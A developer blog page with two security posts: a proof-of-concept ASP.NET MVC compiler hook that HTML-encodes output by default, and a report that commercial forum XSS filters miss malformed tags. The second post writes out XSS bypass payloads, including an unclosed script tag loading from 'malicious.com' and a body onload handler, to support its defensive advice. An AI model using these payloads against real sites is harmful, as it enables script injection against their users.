Link here

Link here

ASP.NET MVC: Prevent XSS with automatic HTML encoding

ASP.NET, MVC, Security 8 Comments »

There’s an interesting (and sometimes heated) debate on the ASP.NET MVC forums about HTML encoding.

It started with a proposal for a helper method to HTML-encode strings as soon as they are received from the visitor, so they’d be stored HTML-encoded in the database. That way, you don’t have to HTML-encode them for display to prevent cross-site scripting. If that was the default behaviour for the UpdateFrom() method, the idea of encoding for storage would no doubt be widely adopted.

Almost everyone else on the forum, though, has a strong preference for not encoding anything until the moment of display. There are some obvious benefits to this approach - you don’t have to remember which strings were pre-encoded (according to their origin), and you don’t have un-encode them when outputting to any non-HTML format. But it does mean you have to remember to encode things wherever you output them.

Sadly the two methods are incompatible, and you will have to choose one side or the other. I am very definitely in the encode-when-displaying camp.

Another solution

What I’d really like is to change the default behaviour of ASPX’s <%= … %> syntax so that it HTML-encodes the result by default. That’s what you want 95% of the time, so why should you keep writing <%= HttpUtility.HtmlEncode(…) %> all the time?

  Current reality In my ideal world
Output unencoded string <%= value %> <%= (RawHtml) value %>
Output encoded string <%= HttpUtility.HtmlEncode(value) %> <%= … %>

This would give us the best of both worlds. You wouldn’t need to remember to HTML-encode your strings (since that happens by default), so there’d be no need to store things pre-encoded in the database and then worry about double-escaping, sharing data with external systems, unencoding for output to non-HTML format and all that other nonsense.

Spike implementation

It’s a great credit to the ASP.NET architecture that we can actually implement that change of behaviour ourselves, and with not much code either. The idea is to intercept the code generation phase that happens when an ASPX file is compiled.

You can specify your own compiler implementation by editing this section of the web.config:

<system.codedom>
   <compilers>
      <compiler language="c#;cs;csharp" type="Microsoft.CSharp.CSharpCodeProvider .. etc" extension=".cs" warninglevel="4" />
   </compilers>
</system.codedom>

… and, helpfully, you can subclass CSharpCodeProvider, override the GenerateCodeFromStatement() method, and redirect all the <%= … %> evaluations through a suitable helper function.

Demonstration

You can download a demonstration project to see this in action, or to install the behaviour into your own project, follow these steps:

1. Download the SafeEncodingHelper assembly (or build it yourself - the demo project includes sources), and add a reference to it in your project.

2. In your web.config, edit the system.codedom.compilers element, to look like this:

<compiler language="c#;cs;csharp" type="SafeEncodingHelper.SafeEncodingCSharpCodeProvider, SafeEncodingHelper" extension=".cs" warninglevel="4">
	<provideroption value="v3.5" name="CompilerVersion" />
	<provideroption value="false" name="WarnAsError" />
</compiler>

3. Also in web.config, under pages/namespaces, add a reference to the SafeEncodingHelper namespace:

<namespaces>
	<add namespace="System.Web.Mvc" />
	<add namespace="System.Linq" />
	<add namespace="SafeEncodingHelper" />
</namespaces>

 

That’s all! You will now find that <%=…%> encodes its output, or you can get unencoded output by casting your value to the RawHtml type, i.e. <%= (RawHtml)myValue %>.

What about MVCToolkit?

You might be thinking that this is going to break the MVC toolkit, since you use it to build HTML controls with a syntax like this:

<%= Html.TextBox("myinput", "It's nice") %>

You might, reasonably, expect this now to render a bunch of useless HTML-encoded nonsense. There’s a neat solution, though - the MVC toolkit could return values of the RawHtml type (which is merely a wrapper around System.String which adds no functionality). This is specially recognised by the SafeEncodingHelper compiler, and bypasses the HTML encoding. So, you can keep your clean syntax for any methods that you specifically want to render unencoded HTML.

Also, if someone isn’t using SafeEncodingHelper, no problem! The RawHtml type has a .ToString() method that simply returns the underlying value, so the MVC toolkit methods would still work just as well.

The demonstration project contains an alternative MVC toolkit that behaves this way. Actually, it only has a single facility (TextBox), but it’s enough to give you the idea.

Should I really use this then?

Firstly, this code comes with no warranties at all. Use it if you want, but beware - I just cooked it up on impulse and there may be any number of special cases I haven’t accounted for. It’s a proof of concept, that’s all.

Unless Microsoft chooses to support the RawHtml type in their MVC toolkit and related methods, you would have to remember to cast all MVC toolkit output to RawHtml, or write your own wrapper methods or something. Not much fun, sorry.

kick it on DotNetKicks.com

Check your XSS filters (Cross-site scripting)

Javascript, Security No Comments »

In the last couple of days I’ve tested the effectiveness of XSS filters in two different commercial forum applications, both advertised as being able to filter out malicious scripts. Neither were effectively protected against this:

<script src="http://malicious.com/script.js"

Agh! All I did was remove the tag’s closing “>” character and neither app recognised it as HTML. The latest versions of Firefox and Internet Explorer both “gracefully” interpret the malformed tag, loading and running the malicious script.

If I didn’t want to load my JS from an external file (to help hide my identity), or if they were specifically preventing the string “<script“, I could have written this:

<body onload="alert('I am evil script'); doEvilStuff();"

Browsers don’t care if you add multiple body tags. They’ll run the “onload” code for all of them.

One of the applications was supposed to filter out all HTML, full stop. Putting images in this supposed plain text was, of course, easy - just miss off the closing bracket of the <IMG> tag.

Rolling your own HTML filter

HTML filtering is hard to get right, because HTML is so permissive. Even the big webmail services occasionally admit that someone’s found a new loophole in their system.

If you can get away with simply HTML-encoding *all* user input at the point of display, do that - it’s easy and very safe, like this:

MyLabel.Text = HttpUtility.HtmlEncode(suspiciousString);

If you have a functional requirement to allow certain HTML tags, you’re going to have to consider the multitude of ways that someone can hide script in HTML.

If you’re writing .NET to parse and reformulate possibly-malformed HTML, I strongly recommend the HTML Agility Pack. It’s a Microsoft-hosted open source project that makes it a breeze to extract plain text - or whitelisted markup - from any string claiming to be HTML.

Don’t rely on some regular expression you cooked up yourself in 10 minutes. You won’t get it right.

Site Meter